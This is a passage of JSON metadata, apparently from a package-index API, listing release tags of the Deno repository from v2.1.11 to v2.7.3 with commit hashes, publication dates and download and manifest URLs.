,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2